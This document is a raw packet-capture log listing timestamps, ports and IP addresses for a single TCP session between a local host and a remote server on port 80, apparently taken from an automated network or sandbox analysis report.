Oct 12, 2021 12:35:36.240626097 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240642071 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240669012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240686893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240688086 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240710974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240731955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240751982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240756035 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240778923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240787983 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240803003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240808964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240825891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240848064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240852118 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240869999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240878105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240891933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240911961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240932941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240936995 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240956068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240978956 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240979910 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241003990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241013050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241028070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241051912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241069078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241075993 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241094112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241120100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241136074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241149902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241156101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241173029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241183043 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241193056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241211891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241220951 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241238117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241259098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241266966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241285086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241305113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241322041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241337061 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241341114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241345882 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241363049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241385937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241394997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241410017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241430998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241436005 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241453886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241476059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241483927 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241502047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241503000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241524935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241545916 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241550922 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241566896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241589069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.241595030 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241662025 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.241668940 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264218092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264256954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264277935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264298916 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264319897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264343977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264352083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264369965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264378071 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264393091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264401913 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264406919 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264413118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264429092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264445066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264448881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264456034 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264466047 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264508009 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264513016 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264518023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264538050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264560938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264576912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264594078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.264661074 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.264672041 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267402887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267438889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267467022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267491102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267508030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267525911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267541885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267559052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267575026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267591000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267602921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267529011 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267615080 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267625093 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267628908 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267632008 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267633915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267633915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267647982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267695904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267700911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267715931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267725945 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267736912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267754078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267769098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267777920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267786026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267786026 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267802000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267818928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267832041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267846107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267863035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267877102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267894983 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267909050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267913103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267919064 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267923117 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267925978 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267929077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267941952 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267951012 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267954111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267970085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267978907 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.267986059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.267999887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268013954 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.268014908 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268029928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268033981 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.268049955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268059969 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.268068075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268081903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268096924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268109083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.268114090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268125057 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268136978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.268138885 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.268174887 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.268182039 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.304444075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.304478884 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.652466059 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679337025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679377079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679399014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679423094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679450035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679474115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679497004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679572105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679574013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679599047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679600954 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679605007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679609060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679617882 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679622889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679645061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679667950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679677963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679689884 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679713964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679727077 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679732084 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679737091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679747105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679761887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679789066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679790974 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679805040 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679811954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679815054 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679835081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.679856062 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679960966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.679975033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709203005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709238052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709261894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709286928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709296942 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709311008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709322929 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709326029 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709343910 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709368944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709393978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709398031 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709407091 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709409952 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709413052 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709418058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709441900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709464073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709474087 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709486961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709495068 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709500074 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709510088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709511995 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709532976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709556103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709567070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709578991 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709580898 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709602118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709605932 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709624052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709633112 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709646940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709656000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709670067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709671974 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709695101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709701061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709718943 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709724903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709747076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709769964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709780931 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709794998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709820032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709839106 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709841013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709856987 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709860086 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709861994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.709887981 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.709913015 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.735847950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.735884905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.735912085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.735934973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.735956907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.735980988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736004114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736023903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736048937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736073971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736098051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736128092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736138105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736154079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736159086 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736164093 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736166954 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736170053 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736172915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736176014 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736179113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736191034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736203909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736206055 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736212969 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736217022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736221075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736221075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736233950 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736237049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736253023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736273050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736278057 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736293077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736303091 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736313105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736315012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736331940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736345053 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736356020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736366034 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736378908 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736387968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736402988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736423016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736448050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736470938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736484051 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736490011 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736491919 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736512899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736536980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736536980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736593008 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736597061 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736601114 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736604929 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736609936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736632109 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736649036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736665964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736665964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736682892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736705065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736715078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736728907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736747980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736751080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736772060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736792088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736799955 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736816883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736839056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736841917 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736860037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736866951 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736877918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736896992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736900091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736917973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736927032 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736933947 CEST	80	49749	195.133.18.140	192.168.2.6
